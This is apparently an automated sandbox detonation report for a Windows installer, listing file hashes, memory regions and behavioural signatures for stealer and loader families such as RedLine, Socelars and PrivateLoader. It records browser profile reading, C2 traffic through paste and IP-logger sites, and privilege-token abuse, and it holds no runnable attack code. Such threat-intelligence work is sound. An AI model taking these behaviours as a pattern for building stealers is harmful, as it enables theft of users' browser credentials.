C:\Users\Admin\AppData\Local\Temp\9h1gI_ny.t

MD5 719406c6176706f60d8f511ce6096c2d
SHA1 5044cc1af74e9d762feabdfe1fa46ad558249a65
SHA256 53642a2d499eb8bc9fdc9c27344436dc5989f9f493c4d21648172b7110e906a0
SHA512 9c00fda0639daaae2882f2932ab8e1b29403b9434473bb34f10d229b33f68d973f1a8b73968b7386ad9d4551cad6cb8ec86c1f45fa57637e0cfcae0c7b0b911e

C:\Users\Admin\AppData\Local\Temp\i5glXU.q

MD5 df345237695fb3974d0adb7ba892db7b
SHA1 4f6904679510f87b4e3df83e4c1f3804cb4aa773
SHA256 76a22ff20b5a218c06469f45c87209471b7f5f33fb680ed539efb090c1632bad
SHA512 bf43ae459535b92f739413aeee3cdb8f27ace4e0009024e0381b13632e1dbc23df667eab924959c43b805b1305dabe6caaf88785fb0ab1d45544d9d46ba7d50e

C:\Users\Admin\AppData\Local\Temp\U9bIuq0J.~dW

MD5 dcb29594703e229efa20bedff41fe3e6
SHA1 7473bf4265ce63a48d46f76af3a709eeb89e5363
SHA256 f0f3e4ac0575c8cca414c05075dc4ec3f9fa987a63942d5ec222758eadca2331
SHA512 bd8e007cc26bf03d202c6cd6a5655d3aebef4ac61e39306fa139f52e1bb051a29c7d088fac3717c57ec23fea6be7260c1d1917a9c76f6bb2c207b2d10b68f982

C:\Users\Admin\AppData\Local\Temp\PajLCM.4

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\2KSA.GF7

MD5 f7289e6a08c21ac5aa08fd51633251a5
SHA1 f052534107af91a3514afb93a1b29e28d8b24a51
SHA256 4020eafc401fc35a7d1e5e4e1dfb6b41ba6a01237a34328b38d9af67f3f26a17
SHA512 0780e065a47fa6a97ae534a78632b8dc7326dc81c561b57b361cc50f07adef519581dc571aee010c615e509fd11ca809143be90160504ea182fd0e3ffe0a6c8a

memory/3324-265-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3324-269-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 d0a8de164afe485a7233e1d55ba4347f
SHA1 c760af9ae23dd96a2b4606881b148c945d74fe7b
SHA256 5ca88d50743cb188cc6908ea0262995adb8ec4702c441d4b837515e9a2fbfb27
SHA512 e66b69286f9efa855c753bbee4307383d553c4a53e5ee2677fc67a11750e1f95374cd4fd7f81c3c65fa3683710c88c89ae4af9211ba347ee664522eff648b429

\??\pipe\crashpad_684_TVIGLFXSNMNFPSFG

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/212-281-0x0000000002FE0000-0x0000000003085000-memory.dmp

memory/212-285-0x00000000030A0000-0x0000000003132000-memory.dmp

memory/212-288-0x00000000030A0000-0x0000000003132000-memory.dmp

memory/3324-289-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3324-290-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 e9a6a4233bf87c319adf0db34e9d603a
SHA1 4de771cbe86611d85d0b8793c7192b8314f7dd02
SHA256 0b3f5ac3e92b578449e901ea9a2ccf66e30f2e437a74105405b5ee0000a05687
SHA512 de3e336b5260286a97d61690c2ab23db98583e6234aee50848b44a6dcf83b99dbf8a2061cd8481b50c1f81c134d1baaf01e4e5a33572ab0d23ec4ddd94c61b7c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 e1cc10c4812bfbc50a2fed24bdda4a7d
SHA1 8947bbe29dbc7fcf1a0ffa28164c3af138474a90
SHA256 7bfff06c910fa94715da000abf4530aecb8bc722ae32ae3e1740f341a5d1118a
SHA512 10026fe88d516a89e104e12bbf723ccc4d88bd4b5dcd8b64fa0a559bf442a9f6f945bb28e020f6b07d70536cc867237d059986dd44fd57290215a77dc7b116c0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f1b2c62be166be024b07e35637b79e4f
SHA1 2ce73344d13b2425af392ba53c52e8e0831288a9
SHA256 1bd4a5024a9a2a6fe0d89f9bc27fda28b0035bb7e2173858ea6bae5f94ceeb3f
SHA512 cf31c033e41045731fdb68249c5bb7b85e9eb5dc833f8ca9af4f6bd262143787d0e43baa19e13ec86c6fa305ae8227142f0b9fd35889bc5a80ff529bad32bf94

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 c5b9037cae3a37536d74fdff24775174
SHA1 a81205140fb8a903cb6216622944f1acd2dd7ebc
SHA256 9c6561cf00c0dde3a580f5094a73b9a11c16de621f544175d1511382381ec879
SHA512 cff0701905ace421943dad7b0d1acf2d2039680cecec4c359751059d47b613c1762b46e02e79e0075c664ca6119c81e09a8eaea84086145abcce7aee8d40cf95

memory/1760-330-0x0000000000400000-0x000000000089C000-memory.dmp

memory/3324-328-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/3324-329-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/212-333-0x0000000000400000-0x00000000005A8000-memory.dmp

memory/4872-332-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/4564-331-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3324-343-0x0000000000400000-0x000000000051C000-memory.dmp

memory/3324-352-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3324-351-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3324-350-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3324-349-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3324-347-0x000000006EB40000-0x000000006EB63000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

MD5 47931ca78e1df6af7ee560e2c7a149bc
SHA1 e7088a39c61827ab3eeadd4bd04c2305fe558ced
SHA256 f796e0a0095c46301bd0380340f2a441b4a72c035737c528aee2254c13030ca8
SHA512 3afcf893d3c9315f03396517ee56d6776778cb9d0c4eb38b85737a006fe17b67096c09bc0085c172ad4caae7a9f25c5508761f383a3b885bf6af514976180cce

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 06de0682337720f0fdb26abe83d9a52f
SHA1 d2e94d376b1d06c21dfcb3edde3a28a29f6e60fe
SHA256 26b0875aefe31f5063a43fcbb8232926f8d9fadcbd98d937473b78f98221d797
SHA512 1901d163d547f274d8efc6a1f851aaf61c31390f987ed7048ff89d34974183e57465673f85f68ef86ffaa67f2ff62e1157b296f85c77c64d4c05582bdcb64b32

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 61a398a0c7b7478af04e558a0d959fee
SHA1 cff0a52eb83eb8f7f42507e3dbbd880fad43bacd
SHA256 fd205c9937a714e984d3097c9542cbb179e328266b5c3d45731b0eb28668a90d
SHA512 7e618c40496484d00bb5e053c9a98c93b45ce57b1fd742b7250a10202dbf270ffd961e534575138bd1ebed8970e4ea189e88c59550c3c304f13ba27e72797d92

memory/212-385-0x00000000030A0000-0x0000000003132000-memory.dmp

memory/212-386-0x0000000003140000-0x0000000004EEF000-memory.dmp

memory/212-387-0x0000000004EF0000-0x0000000004F7C000-memory.dmp

memory/212-389-0x0000000004F90000-0x0000000005019000-memory.dmp

memory/212-388-0x0000000004F90000-0x0000000005019000-memory.dmp

memory/212-391-0x0000000004F90000-0x0000000005019000-memory.dmp

memory/212-392-0x00000000009C0000-0x00000000009C1000-memory.dmp

memory/212-393-0x00000000009D0000-0x00000000009D4000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 85e45dc522a5043c82932622ef5e31d2
SHA1 d38b8bff91168f0d313bed36bd4e23542f692789
SHA256 5911f1982bef5a2e1bb37d5db9279399b9e8bf2c81585314f8ee09bd92be96c0
SHA512 6d763fdbdeb36eff0e8f8b96070ae692cd48126aec8d4ae01a5586f6b57e38ec45f628bf307b36bd6d3224f9eb5be03d2c423fd1c94def4bedb530a15af01674

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\0a05a4c4-4387-4216-85bf-2b67f34d5ab3.tmp

MD5 b20aa8e4bde869a684cfd9615f24d705
SHA1 c0c22cff2ee8aabc2491ced7685ba688efb60d93
SHA256 ddaf6da77d383d881af7606164b9a158ac94f8fa6567cd9e44486cc056d036af
SHA512 6a0052f2d03f7e0f5397d8f37aef988e6308c5d6220c38884b805b2ba868a15bd80556bef92ac28a076f3e1166e970a38cc3ad8b244ab763582e8f75d1565b40

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 bae97f3540b42018c48b9190a6667241
SHA1 34bf0a682a36c8706294775b75473ed5d2f9cb3d
SHA256 c1dbd514548ce4508956233ed12fd9c21d159629cdb3ab7e50655e60a544c71e
SHA512 50b95be72030d93e11302736b496171f566a71aade1d5ff21ec0d4128e38a3ca5be2b11414c38867f95cbc1c5fba31b1936438405348d21ce3b9eacf749e04af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 89fdc8903fec34e96d29447f2a1d4746
SHA1 a9648c31eb965e79cdb9c7b56c0573a87b1eb907
SHA256 4bdeada67eb776c1ba8f0411ed3fde36ec617173b14c359c58cdf5e02ffb6f39
SHA512 1ec84f67b7d20c5d4e74319a8756012c229b83c7e3d65d695c376b3ed7e40fe80fcfaf7d35a380cd73e245948f54caed3be302c1a78f3d2c20d9d82e5ee9b3a5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 800fe7cc177c98a66706e568913495e7
SHA1 5d3c3fb81a8358166b3859c02c0b5df6b857c73c
SHA256 ae580a0820d0491329b07aa507da7ff32b10b5f0596e80e183815e6b7fa7ffb8
SHA512 f5777e9bed97f8559dd99b140a8d3aff73b56dc76cbaad737174dcfcdabca9a1998cb2dfb00e52e1c258bd9538d6426488d4b320a802e09256b7cfc5b882108b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 e8095a2dd185e0447c41514410b2eb02
SHA1 0889f63582023375cbdbaa063cae13beaebcfbfe
SHA256 24a93ca19d929010c2a5b64f1b37713ea1ef79c8492821c6d13d41efb2c69dc2
SHA512 38c312b916e7598241f6a2b6d4b6748ac071e86d9a8fb27244390844631c5d531874339e26c97039b4611b279082f285e9cd71c0acd498a79d0d4cf5e7c1d0f5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 fd316b6f7e242a76d78ab5d5f1b5ad24
SHA1 f4e3bf1dd4bb56e3d061446fa82dd0a613a46648
SHA256 d5430cdc7b935c17857e20665b997ec73d26ad2ffa0d262081ea2f783ff42db9
SHA512 83cd524287d17d79f4290b7fcd290491e127150066d6828fac9b2868ddf93613114fa31f04dbce679fe4309377cebd9f9b83a5e43cc6e4222ee1a459f27c6909

Analysis: behavioral3

Detonation Overview

Submitted: 2024-11-23 18:41
Reported: 2024-11-23 18:43
Platform: win7-20241023-en
Max time kernel: 148s
Max time network: 150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142ac5249376e895.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat144474a564d26f29.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14febbc433.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0VANL.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0VANL.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0VANL.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-0VANL.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PEG5V.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PEG5V.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PEG5V.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1624 set thread context of 2892 N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142ac5249376e895.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat142b09ae40c44cf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14a7594cc5a0116.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat144474a564d26f29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-0VANL.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1487ca754e680f91.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14febbc433.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-PEG5V.tmp\Sat1481f5a7e3eccdd.tmp N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-PEG5V.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14febbc433.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS86973696\Sat14b47e86b9c16b.exe N/A
